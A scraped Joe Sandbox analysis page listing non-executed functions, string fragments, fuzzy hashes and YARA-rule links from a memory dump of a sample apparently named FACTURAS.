Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: e1752afb24743ca4060ea10a760c120a02f7b9768a50a4e9100c73e35c553a1d
Instruction ID: e6b7c8c99325a19c608c6956ad72a83e219003d2e08a957c1b7b9cdcc9dd46e4
Opcode Fuzzy Hash: e1752afb24743ca4060ea10a760c120a02f7b9768a50a4e9100c73e35c553a1d
Instruction Fuzzy Hash: 0A31FCA584E7D05FD7039B305D2A6917FB09E13224B1E49EBC0C1DF5E3E26E0809C726

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0306E3A7, Relevance: 13.4, Strings: 10, Instructions: 898COMMON

Download Yara Rule

Strings

Uk~R, xrefs: 0306C7C0
`{, xrefs: 0306E85D
^'S, xrefs: 0306E731
2+g, xrefs: 0306A110
'}4, xrefs: 0306EB4E
-3n, xrefs: 0306B206
@ , xrefs: 0306A252
?k, xrefs: 0306A491
$, xrefs: 03069D0C
DR, xrefs: 0306E3AD

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: $$-3n$2+g$?k$DR$Uk~R$'}4$@ $^'S$`{
API String ID: 0-1699459193
Opcode ID: c5414957722aeb40e91bb5cf7cb8cd305263640be996867878354347450397c7
Instruction ID: 16d8f9fa2549b1bdd286efaa91c97d70fa5c86dcefaaf19d172b102cce5ba056
Opcode Fuzzy Hash: c5414957722aeb40e91bb5cf7cb8cd305263640be996867878354347450397c7
Instruction Fuzzy Hash: 8E82ECB2A05389DFDB74DF29CD947DA7BA2FF58300F45852ADC899B214D7309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0306CD2E, Relevance: 9.4, Strings: 7, Instructions: 699COMMON

Download Yara Rule

Strings

`, xrefs: 0306CEB0
!&u, xrefs: 0306CEA4
2+g, xrefs: 0306A110
-3n, xrefs: 0306B206
@ , xrefs: 0306A252
?k, xrefs: 0306A491
$, xrefs: 03069D0C

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: !&u$$$-3n$2+g$?k$`$@
API String ID: 0-232066419
Opcode ID: a35df16f6649fcad152f51747bd8f94f500de6e398313ee0edb47451bc6709ac
Instruction ID: c752f7634afb55a1afc377b73b83d2d59c0c888ea84696a2aed1a8bf978aec4d
Opcode Fuzzy Hash: a35df16f6649fcad152f51747bd8f94f500de6e398313ee0edb47451bc6709ac
Instruction Fuzzy Hash: 1E62B9B2A05389DFDB74DE29CD847DABBB2FF54300F45852ADC899B214D7349A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0307382F, Relevance: 7.1, Strings: 5, Instructions: 857COMMON

Download Yara Rule

Strings

2+g, xrefs: 0306A110
-3n, xrefs: 0306B206
@ , xrefs: 0306A252
?k, xrefs: 0306A491
$, xrefs: 03069D0C

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: $$-3n$2+g$?k$@
API String ID: 0-2600085141
Opcode ID: c9e47b58dcbedd3e962835bbe56ea73caf90707c9d2a32732299ae08ab08b972
Instruction ID: 872db39014992f855f9ef8f72376c537681cb30c3aa8bc2cc190e3d7381ad175
Opcode Fuzzy Hash: c9e47b58dcbedd3e962835bbe56ea73caf90707c9d2a32732299ae08ab08b972
Instruction Fuzzy Hash: 2482DBB2A05389DFDB74DE29CD847DABBB2FF54300F45852ADC899B214D7349A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0306993C, Relevance: 7.0, Strings: 5, Instructions: 704COMMON

Download Yara Rule

Strings

2+g, xrefs: 0306A110
-3n, xrefs: 0306B206
@ , xrefs: 0306A252
?k, xrefs: 0306A491
$, xrefs: 03069D0C

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: $$-3n$2+g$?k$@
API String ID: 0-2600085141
Opcode ID: e0fbd91c86b78ced71cc4376b51bf80b4e78b10db57aac78e83c6126f606897a
Instruction ID: 92ea1bafb5321b7e5c228b52a74fa09901ef516432ca7ce4f62d26b15155da17
Opcode Fuzzy Hash: e0fbd91c86b78ced71cc4376b51bf80b4e78b10db57aac78e83c6126f606897a
Instruction Fuzzy Hash: 7562FDB1A08349DFDB64DF39C9887DAB7B2FF54300F45812AEC899B614C7749A94CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03069A80, Relevance: 6.9, Strings: 5, Instructions: 672COMMON

Download Yara Rule

Strings

2+g, xrefs: 0306A110
-3n, xrefs: 0306B206
@ , xrefs: 0306A252
?k, xrefs: 0306A491
$, xrefs: 03069D0C

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: $$-3n$2+g$?k$@
API String ID: 0-2600085141
Opcode ID: 280e1f32199d72d708a8fe7596019765d2f05bd93a04c24b878f3346e29abdc5
Instruction ID: 4203a7548a40e5094e5de548be4e5146108d5fac57a921f991d9592c07e4d169
Opcode Fuzzy Hash: 280e1f32199d72d708a8fe7596019765d2f05bd93a04c24b878f3346e29abdc5
Instruction Fuzzy Hash: DE52EBB2A09349DFDB64CF39C9887DAB7B2FF54300F45812AE8899B614C7349A95CB41

Uniqueness

Uniqueness Score: -1.00%

Function 030697F8, Relevance: 6.9, Strings: 5, Instructions: 650COMMON

Download Yara Rule

Strings

2+g, xrefs: 0306A110
-3n, xrefs: 0306B206
@ , xrefs: 0306A252
?k, xrefs: 0306A491
$, xrefs: 03069D0C

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: $$-3n$2+g$?k$@
API String ID: 0-2600085141
Opcode ID: e45563a5869790accd02858692512070e5bf77cc3891786dd5bc95074b9bc551
Instruction ID: afd78109454a408255ee58927372fd5020be877ed51dbd1e55e30bcf2ec1e527
Opcode Fuzzy Hash: e45563a5869790accd02858692512070e5bf77cc3891786dd5bc95074b9bc551
Instruction Fuzzy Hash: A452DBB2A05349DFDB749F69CD847DABBB2FF58300F45852ADC899B214C7349A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0306C76B, Relevance: 6.9, Strings: 5, Instructions: 647COMMON

Download Yara Rule

Strings

2+g, xrefs: 0306A110
-3n, xrefs: 0306B206
@ , xrefs: 0306A252
?k, xrefs: 0306A491
$, xrefs: 03069D0C

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: $$-3n$2+g$?k$@
API String ID: 0-2600085141
Opcode ID: 9e9e65264b432c44b3db07b749142f380939e39b6b26c4b5fcef9b082323c3b3
Instruction ID: b25ff16297809a426e575bff8459735e3180699fa384a5a6476a8ea9676e57d6
Opcode Fuzzy Hash: 9e9e65264b432c44b3db07b749142f380939e39b6b26c4b5fcef9b082323c3b3
Instruction Fuzzy Hash: B252BAB2A05349DFDB749F69CD847DABBB2FF58300F45852ADC899B214C7349A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03069DDE, Relevance: 5.7, Strings: 4, Instructions: 671COMMON

Download Yara Rule

Strings

2+g, xrefs: 0306A110
-3n, xrefs: 0306B206
@ , xrefs: 0306A252
?k, xrefs: 0306A491

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n$2+g$?k$@
API String ID: 0-2338055543
Opcode ID: 9e0b944483ba3f557132ce6625c96bb41c96b25b46f04a3e9c426764ce3c9853
Instruction ID: 14476bad29489de7733038cf670a90621fc1545f6a76ae8ee5c33a7b88c1b73a
Opcode Fuzzy Hash: 9e0b944483ba3f557132ce6625c96bb41c96b25b46f04a3e9c426764ce3c9853
Instruction Fuzzy Hash: 5852EEB2A05349DFDB64CF39C8887DAB7B2FF54300F45822ADC499B614CB759AA4CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03069CDB, Relevance: 5.6, Strings: 4, Instructions: 647COMMON

Download Yara Rule

Strings

2+g, xrefs: 0306A110
-3n, xrefs: 0306B206
@ , xrefs: 0306A252
?k, xrefs: 0306A491

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n$2+g$?k$@
API String ID: 0-2338055543
Opcode ID: 109f686c2376b98e381d2af73eebb15a36d16aadc3f8646a41e1764841dbcb9b
Instruction ID: ced404c28093666e769d30d45ba8b2457ffed41b72ec1dd635edcc0eb2b97f76
Opcode Fuzzy Hash: 109f686c2376b98e381d2af73eebb15a36d16aadc3f8646a41e1764841dbcb9b
Instruction Fuzzy Hash: F952FBB2A05349DFDB64CF29CD887DABBB2FF54300F45822ADC899B614C7749A91CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03069E60, Relevance: 5.6, Strings: 4, Instructions: 602COMMON

Download Yara Rule

Strings

2+g, xrefs: 0306A110
-3n, xrefs: 0306B206
@ , xrefs: 0306A252
?k, xrefs: 0306A491

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n$2+g$?k$@
API String ID: 0-2338055543
Opcode ID: 3a98ca3a96bef9c92cb890f741eb8ebcbb1d51af0576c86d0bc367058e988457
Instruction ID: 67f1800abb9c84b0070ca47f5854fb8fc86c7ba62c52f3ab34d9834f71ec8d86
Opcode Fuzzy Hash: 3a98ca3a96bef9c92cb890f741eb8ebcbb1d51af0576c86d0bc367058e988457
Instruction Fuzzy Hash: 7242EAB2A05349DFDB64CF39C9887DAB7B2FF54300F45812AEC899B614CB749A91CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0306A0D5, Relevance: 5.6, Strings: 4, Instructions: 578COMMON

Download Yara Rule

Strings

2+g, xrefs: 0306A110
-3n, xrefs: 0306B206
@ , xrefs: 0306A252
?k, xrefs: 0306A491

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n$2+g$?k$@
API String ID: 0-2338055543
Opcode ID: 3a5bf644cf53d628bf89bb68bdd57b606279ade16ecf7d6926c9c74e47fc6b52
Instruction ID: cf0b83ab7de8dff180b13f9af97e240b1730fed75f25aac44fa0cf99fb16b08b
Opcode Fuzzy Hash: 3a5bf644cf53d628bf89bb68bdd57b606279ade16ecf7d6926c9c74e47fc6b52
Instruction Fuzzy Hash: B442FDB2A09349DFDB64CF39C9887DAB7B2FF54300F45812ADC899B610CB759A94CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03069FA8, Relevance: 5.6, Strings: 4, Instructions: 570COMMON

Download Yara Rule

Strings

2+g, xrefs: 0306A110
-3n, xrefs: 0306B206
@ , xrefs: 0306A252
?k, xrefs: 0306A491

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n$2+g$?k$@
API String ID: 0-2338055543
Opcode ID: 5b475d6c5af8d261d56cb9939597ce78c1c421ef3fd493752ff1c2caf2a59df9
Instruction ID: 7d97b6de420d0067b949ff01e663a4c4b0b2d83beccebed26800520134ca9b17
Opcode Fuzzy Hash: 5b475d6c5af8d261d56cb9939597ce78c1c421ef3fd493752ff1c2caf2a59df9
Instruction Fuzzy Hash: 1842EBB2A05349DFDB64CF29CD887DAB7B2FF54300F45812AEC899B614CB759A90CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0306A0B4, Relevance: 5.5, Strings: 4, Instructions: 524COMMON

Download Yara Rule

Strings

2+g, xrefs: 0306A110
-3n, xrefs: 0306B206
@ , xrefs: 0306A252
?k, xrefs: 0306A491

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n$2+g$?k$@
API String ID: 0-2338055543
Opcode ID: 638883f60c1374a1799a2979b91d746bad924c1c5c1985faf493672518cefd23
Instruction ID: c6711599785d3ed41b70486ab7f53f4fc42242b374dbeb9202909f980b5fd350
Opcode Fuzzy Hash: 638883f60c1374a1799a2979b91d746bad924c1c5c1985faf493672518cefd23
Instruction Fuzzy Hash: E232CBB2A05349DFDB749F69CD847DABBB2FF58300F45812ADC899B214C7749A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0306A122, Relevance: 4.3, Strings: 3, Instructions: 553COMMON

Download Yara Rule

Strings

-3n, xrefs: 0306B206
@ , xrefs: 0306A252
?k, xrefs: 0306A491

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n$?k$@
API String ID: 0-2395724388
Opcode ID: 9e6405dc1bdc7ba417eb914e6bea0c8d791b493b26500bd32adc0b550a1083de
Instruction ID: faad73d3c14237e8ae42784197fc1e41f36736e9931fc1d7a73f70dc25678fee
Opcode Fuzzy Hash: 9e6405dc1bdc7ba417eb914e6bea0c8d791b493b26500bd32adc0b550a1083de
Instruction Fuzzy Hash: 60320EB2A05349DFDB64CF39C9887DAB7B2FF54300F45822ADC499B610CB759AA4CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0306E3C2, Relevance: 4.0, Strings: 3, Instructions: 275COMMON

Download Yara Rule

Strings

^'S, xrefs: 0306E731
`{, xrefs: 0306E85D
'}4, xrefs: 0306EB4E

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: '}4$^'S$`{
API String ID: 0-1767395990
Opcode ID: 8d4f1d89c8403f2047f6024fe297f73f6278abb62ca234fad6a5ee694334be7e
Instruction ID: 0f146a3ff8900acb5bb42546f3fa0b7814c32e5e9be51c674829ce865007638a
Opcode Fuzzy Hash: 8d4f1d89c8403f2047f6024fe297f73f6278abb62ca234fad6a5ee694334be7e
Instruction Fuzzy Hash: 40B1EC36A0838ADFCB78CF65C9583EAB3B6FF65300F15412EDC499AA11DB315A60DB41

Uniqueness

Uniqueness Score: -1.00%

Function 0306EF04, Relevance: 4.0, Strings: 3, Instructions: 254COMMON

Download Yara Rule

Strings

^'S, xrefs: 0306E731
`{, xrefs: 0306E85D
'}4, xrefs: 0306EB4E

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: '}4$^'S$`{
API String ID: 0-1767395990
Opcode ID: 26a19052f28532cbe0de7c1b40a8554e91e4614f75bfe4496091e5ab24c2680e
Instruction ID: 8b01b04b6fe71ef22f8ce7318f2b92cb94a2fd91089984b809610fe53ebc77a6
Opcode Fuzzy Hash: 26a19052f28532cbe0de7c1b40a8554e91e4614f75bfe4496091e5ab24c2680e
Instruction Fuzzy Hash: 5DA1FC36A0838ADFCB78CF25CD583EAB3B6EF65310F05412EDC4A9A911DB715A60DB41

Uniqueness

Uniqueness Score: -1.00%

Function 0306E4F6, Relevance: 4.0, Strings: 3, Instructions: 246COMMON

Download Yara Rule

Strings

^'S, xrefs: 0306E731
`{, xrefs: 0306E85D
'}4, xrefs: 0306EB4E

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: '}4$^'S$`{
API String ID: 0-1767395990
Opcode ID: 5d292325d6e819ad195a4631b7fb90a990808922641e51b4b10249a9befa8288
Instruction ID: 01570bed7348b1d33ea71c448e84a31118e7e4651fe9204cab03956878a41a63
Opcode Fuzzy Hash: 5d292325d6e819ad195a4631b7fb90a990808922641e51b4b10249a9befa8288
Instruction Fuzzy Hash: DFA1FD32A08386DFDB78CF25CD583EAB3B6EF65310F06412EDC499A911DB715A60DB41

Uniqueness

Uniqueness Score: -1.00%

Function 0306E65C, Relevance: 4.0, Strings: 3, Instructions: 212COMMON

Download Yara Rule

Strings

^'S, xrefs: 0306E731
`{, xrefs: 0306E85D
'}4, xrefs: 0306EB4E

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: '}4$^'S$`{
API String ID: 0-1767395990
Opcode ID: fab2b802bbaa5416904c0900fd4787a6224f96adae88c799402eb23149391301
Instruction ID: 06b8c840db9be066dd59af75bbbf5bda22c9024dd5f0dc07409974d700f2bab2
Opcode Fuzzy Hash: fab2b802bbaa5416904c0900fd4787a6224f96adae88c799402eb23149391301
Instruction Fuzzy Hash: A2913232A48346CBDB74CF25CD583EAB3B2FF61310F15816EDC089A911DB725A64EB40

Uniqueness

Uniqueness Score: -1.00%

Function 0306EEB4, Relevance: 4.0, Strings: 3, Instructions: 205COMMON

Download Yara Rule

Strings

^'S, xrefs: 0306E731
`{, xrefs: 0306E85D
'}4, xrefs: 0306EB4E

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: '}4$^'S$`{
API String ID: 0-1767395990
Opcode ID: 5bfa966d0964ffc0467b38c3999c916cec87bc2543346684d0e543f1b32ea600
Instruction ID: 781ac414b4bb2dfc6b30b3c68a5d739f422e2c5f7bdc2f4e1343029d33ea5828
Opcode Fuzzy Hash: 5bfa966d0964ffc0467b38c3999c916cec87bc2543346684d0e543f1b32ea600
Instruction Fuzzy Hash: 94810C7AA05389DFCBB4CF24CE547EE77A1BF19350F06442ADC4A9B620D3315A80DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0306A28E, Relevance: 3.0, Strings: 2, Instructions: 516COMMON

Download Yara Rule

Strings

-3n, xrefs: 0306B206
?k, xrefs: 0306A491

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n$?k
API String ID: 0-3003533122
Opcode ID: 304be82652755c403017fa42a492df5a3b0f64b44c081bcd16f0e770b7f51a03
Instruction ID: 0f0a6269ec45c62ea7782f09a5ebeb894784d643184380eb2dd61fe6dbca9795
Opcode Fuzzy Hash: 304be82652755c403017fa42a492df5a3b0f64b44c081bcd16f0e770b7f51a03
Instruction Fuzzy Hash: 8522FEB2A05349DFDB64CF39C9887DAB7B2FF64300F45812ADC499B610CB759A94CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03074F2E, Relevance: 3.0, Strings: 2, Instructions: 507COMMON

Download Yara Rule

Strings

&E#Z, xrefs: 030755A6
@)3\, xrefs: 03075CFC

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: &E#Z$@)3\
API String ID: 0-731971559
Opcode ID: e4ab8fc4b84c5c6acc6e79374edd605b8e2856f7ab0fc0a889fc063b7ce42019
Instruction ID: 15b3387dda5fd6b2199a2464fb864a3f4dd7e0af88767c5f4135cb6c2708c009
Opcode Fuzzy Hash: e4ab8fc4b84c5c6acc6e79374edd605b8e2856f7ab0fc0a889fc063b7ce42019
Instruction Fuzzy Hash: 3D22EA719097C58FDB71CF38CC987DA7BE2AF52320F49819AC8998F296D3318646C716

Uniqueness

Uniqueness Score: -1.00%

Function 0306A3A0, Relevance: 3.0, Strings: 2, Instructions: 493COMMON

Download Yara Rule

Strings

-3n, xrefs: 0306B206
?k, xrefs: 0306A491

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n$?k
API String ID: 0-3003533122
Opcode ID: 9d1518c4530a687ac0006fdb47069c643411b87691da148cb63fecfc9cab4fe1
Instruction ID: ea73b349851d6256cf836fb16b2b6cf6b9b2ea99f4c5b024f1f6bafde7650380
Opcode Fuzzy Hash: 9d1518c4530a687ac0006fdb47069c643411b87691da148cb63fecfc9cab4fe1
Instruction Fuzzy Hash: FB220FB2A04349DFDB64CF39C9987DAB7B2FF64300F45812ADC899B610C7759A94CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0306E75A, Relevance: 2.7, Strings: 2, Instructions: 208COMMON

Download Yara Rule

Strings

`{, xrefs: 0306E85D
'}4, xrefs: 0306EB4E

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: '}4$`{
API String ID: 0-2370874510
Opcode ID: 2d78bf4ef537bd4f31b4d2314046c130638df912e5cb130df791edc7994e3b67
Instruction ID: faad380eab6128c31436ab5215dfcb8f3f1e0654962b7b2553d8b06e09ff1f63
Opcode Fuzzy Hash: 2d78bf4ef537bd4f31b4d2314046c130638df912e5cb130df791edc7994e3b67
Instruction Fuzzy Hash: 7C812E32A48386DBDB38CF26CD483EAB3B6FF61310F15816EDC149A911DB725664EB40

Uniqueness

Uniqueness Score: -1.00%

Function 0306A4C0, Relevance: 1.7, Strings: 1, Instructions: 479COMMON

Download Yara Rule

Strings

-3n, xrefs: 0306B206

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n
API String ID: 0-1136336886
Opcode ID: 77fd0269a2c633abc79fe3b2f150a1e7c7261e9f68f4f55001d44b9d37fb3498
Instruction ID: 2d0da29e277fa37a0277a0eff519345a39aca030a65fdece5483299faafaaa31
Opcode Fuzzy Hash: 77fd0269a2c633abc79fe3b2f150a1e7c7261e9f68f4f55001d44b9d37fb3498
Instruction Fuzzy Hash: 9022ECB2A04349DFDB64CF79C9987DAB7B2FF64300F45412AEC899B610CB719A94CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0306A730, Relevance: 1.7, Strings: 1, Instructions: 435COMMON

Download Yara Rule

Strings

-3n, xrefs: 0306B206

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n
API String ID: 0-1136336886
Opcode ID: c82ea4cbca1a016ac234a846a5ea27f96f35683b9d84e3818a4dbf74943c86fd
Instruction ID: 57561f2b693c78b3a1b36bd35d01e3e9892c64b322fd0f641da91db00e0f0e86
Opcode Fuzzy Hash: c82ea4cbca1a016ac234a846a5ea27f96f35683b9d84e3818a4dbf74943c86fd
Instruction Fuzzy Hash: E112EE72A08349DFDB65CF79C8883DAB7B2FF65300F45412AEC899B611CB758A94CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0306A6C9, Relevance: 1.6, Strings: 1, Instructions: 391COMMON

Download Yara Rule

Strings

-3n, xrefs: 0306B206

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n
API String ID: 0-1136336886
Opcode ID: a341ec5caf4ef1ee3764821275f436bf746c6b6d4e3cac6c059bd763d3031b6e
Instruction ID: d58da252d775ab70ae64849e041529682f7d9e15da1498cbd86888928b20c45e
Opcode Fuzzy Hash: a341ec5caf4ef1ee3764821275f436bf746c6b6d4e3cac6c059bd763d3031b6e
Instruction Fuzzy Hash: B4020CB2A05388DFDB749F69CD847DA7BB2FF59300F45402ADC899B214C7758A81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0306A9DE, Relevance: 1.6, Strings: 1, Instructions: 367COMMON

Download Yara Rule

Strings

-3n, xrefs: 0306B206

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n
API String ID: 0-1136336886
Opcode ID: 998df6c986d392913d691d499495196ab222ac21606653c9960951d6d4d1bfbd
Instruction ID: 6e46ff257e229fc178e95a370f0349915872c8339ba1df33ad081e7595c8caf1
Opcode Fuzzy Hash: 998df6c986d392913d691d499495196ab222ac21606653c9960951d6d4d1bfbd
Instruction Fuzzy Hash: 2AF1DD72A04349DFDB64CF69CC887DAB7B2FF65300F45812AEC599B610CB719AA4CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0306AAFA, Relevance: 1.6, Strings: 1, Instructions: 357COMMON

Download Yara Rule

Strings

-3n, xrefs: 0306B206

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n
API String ID: 0-1136336886
Opcode ID: 810673294d52c8a97681de2c8d7878f2d2119b84b24936f6b8ded3d998e5e747
Instruction ID: 05264227c2e465bae1bb158e8c265a06c862601ebfa4a107e370dc24f9f521bf
Opcode Fuzzy Hash: 810673294d52c8a97681de2c8d7878f2d2119b84b24936f6b8ded3d998e5e747
Instruction Fuzzy Hash: A3E10F71A05349DFDB65CF79C8883DAB7B2FF65300F45812AEC589B611CBB19A64CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0306AC38, Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

-3n, xrefs: 0306B206

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n
API String ID: 0-1136336886
Opcode ID: 7ce0b3e07535f8bcf020f2471a0330c75c2cd35e7f40dfda536a349e79353745
Instruction ID: 313133b3bf44d0db61a4865d8b1b949e6dbc9b8ed6b7a4e817a14dc02d0ca7ae
Opcode Fuzzy Hash: 7ce0b3e07535f8bcf020f2471a0330c75c2cd35e7f40dfda536a349e79353745
Instruction Fuzzy Hash: F9D1ED72A05349DFDB65CF79C8483DAB7B2FF65300F45812AEC589B610CBB19AA4DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0306AD74, Relevance: 1.5, Strings: 1, Instructions: 289COMMON

Download Yara Rule

Strings

-3n, xrefs: 0306B206

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

